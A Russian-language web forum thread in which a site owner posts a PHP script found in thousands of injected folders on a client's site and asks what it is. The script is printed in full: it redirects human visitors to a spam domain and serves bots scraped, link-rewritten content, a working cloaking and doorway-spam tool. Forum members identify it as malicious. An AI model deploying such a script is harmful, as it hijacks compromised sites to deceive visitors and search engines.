0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 749 Просмотров
*

katalog_2003

  • Захожу иногда
  • 71
  • 0 / 0
не могу понять что за скрипт может кто подскажет  спасибо

<?php


$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']);
if((strpos($tmp, 'bot')!= true)){
header('location:http://deskincream2016.lori-ellis.com/');
exit;
}


function gethttpcnt($url,$username = '',$password = '',$timeout = 10){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$cnt = curl_exec($ch);
curl_close($ch);
return $cnt;
}
 $fromsite="http://www.fitforfun.de/beauty-wellness/haut-haare/pigmentflecken/hautprobleme_aid_5500.html";
 $website="http://www.fitforfun.de/";

 $ss=$_SERVER['PHP_SELF'];
 $ss=str_replace("index.php","",$ss);
 $otherstring=$fromsite;
 
 $content=gethttpcnt($otherstring);
 $content=str_replace("\"images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"/includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"../includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"min/","\"" . $website . "min/",$content);
 $content=str_replace("\"media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"/css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"../css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../js/","\"" . $website . "/images/",$content);
 $content=str_replace("'images/","'" . $website . "/images/",$content);
 $content=str_replace("'/images/","'" . $website . "/images/",$content);
 $content=str_replace("'../images/","'" . $website . "/images/",$content);
 $content=str_replace("'Images/","'" . $website . "/images/",$content);
 $content=str_replace("'/Images/","'" . $website . "/images/",$content);
 $content=str_replace("'../Images/","'" . $website . "/images/",$content);
 $content=str_replace("'includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'/includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'../includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'min/","'" . $website . "min/",$content);
 $content=str_replace("'media/","'" . $website . "/images/",$content);
 $content=str_replace("'/media/","'" . $website . "/images/",$content);
 $content=str_replace("'../media/","'" . $website . "/images/",$content);
 $content=str_replace("'skin/","'" . $website . "/images/",$content);
 $content=str_replace("'/skin/","'" . $website . "/images/",$content);
 $content=str_replace("'../skin/","'" . $website . "/images/",$content);
 $content=str_replace("'js/","'" . $website . "/images/",$content);
 $content=str_replace("'/js/","'" . $website . "/images/",$content);
 $content=str_replace("'../js/","'" . $website . "/images/",$content);
 $content=str_replace('href="/','href="' . $website,$content);
 $content=str_replace('"' . $fromsite . '"','"' . $_SERVER['HTTP_HOST'] . $ss . '"',$content);
 $content=str_replace("'" . $fromsite . "'","'" . $_SERVER['HTTP_HOST'] . $ss . "'",$content);
 echo $content;
?>
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Вы лучше сначала расскажите, чем этот скрипт вам интересен, потому что, скорее всего, он создан не для благих целей. Он вам как-то вредит или вы хотите его использовать?
Не будь паразитом, сделай что-нибудь самостоятельно!
*

beliyadm

  • Легенда
  • 9758
  • 1664 / 66
  • Севастополь, Россия
Шаблон качался с варезного ресурса? Вот и скрипт спамерский. Либо просто скрытая реклама либо бекдор глубже лежит
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В скрипте много вставок на сайты. И другой вопрос- дата создания скрипта, и с каким расширением этот скрипт появился в файлах сайта. Или хакер получил доступ к хостингу - и внедрил этот скрипт.
*

beliyadm

  • Легенда
  • 9758
  • 1664 / 66
  • Севастополь, Россия
Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В бесплатных расширениях реклама открытая, а не укрыта base64 или другими скрытыми способами. Я лично в бесплатных никогда не видел рекламы, кроме ссылки на сайт разработчика.
Все истины, которые я хочу вам изложить, — бесстыдная ложь. Сделать всё хорошо
TLG: @Beliyadm
*

katalog_2003

  • Захожу иногда
  • 71
  • 0 / 0
Сайт был передан на оптимизацию вскрываю а там папок ba123 и т.д 3500 шт index.php в нутри
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Явно ничего хорошего. Лечите сайт.
*

katalog_2003

  • Захожу иногда
  • 71
  • 0 / 0
HaCkeD By Dr.Silnt HilL не знаете что это
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Явно ничего хорошего. Лечите сайт.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
HaCkeD By Dr.Silnt HilL не знаете что это
"Доктор Silnt HilL тебя поимел" - что-то вроде этого. Хотя он не такой уж крутой, судя по коду.
Не будь паразитом, сделай что-нибудь самостоятельно!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не могу обновить контент на странице

Автор Aleksey G

Ответов: 10
Просмотров: 488
Последний ответ 02.01.2024, 22:11:43
от Aleksey G
Я создал пользователя Author, но он не может зайти в редактирование

Автор Olegus79

Ответов: 7
Просмотров: 481
Последний ответ 19.10.2023, 20:48:52
от Vastriet
Как может?

Автор DuaneFord

Ответов: 2
Просмотров: 428
Последний ответ 04.08.2023, 08:05:06
от Vastriet
Не могу найти куда сохранились стили CSS после их обозначения в html модуле

Автор bustdwn

Ответов: 8
Просмотров: 330
Последний ответ 03.10.2022, 14:58:28
от marksetter
Знакомый почему-то не может войти в учетную запись Joomla со своего компьютера

Автор admi5575

Ответов: 6
Просмотров: 762
Последний ответ 18.12.2021, 20:34:59
от draff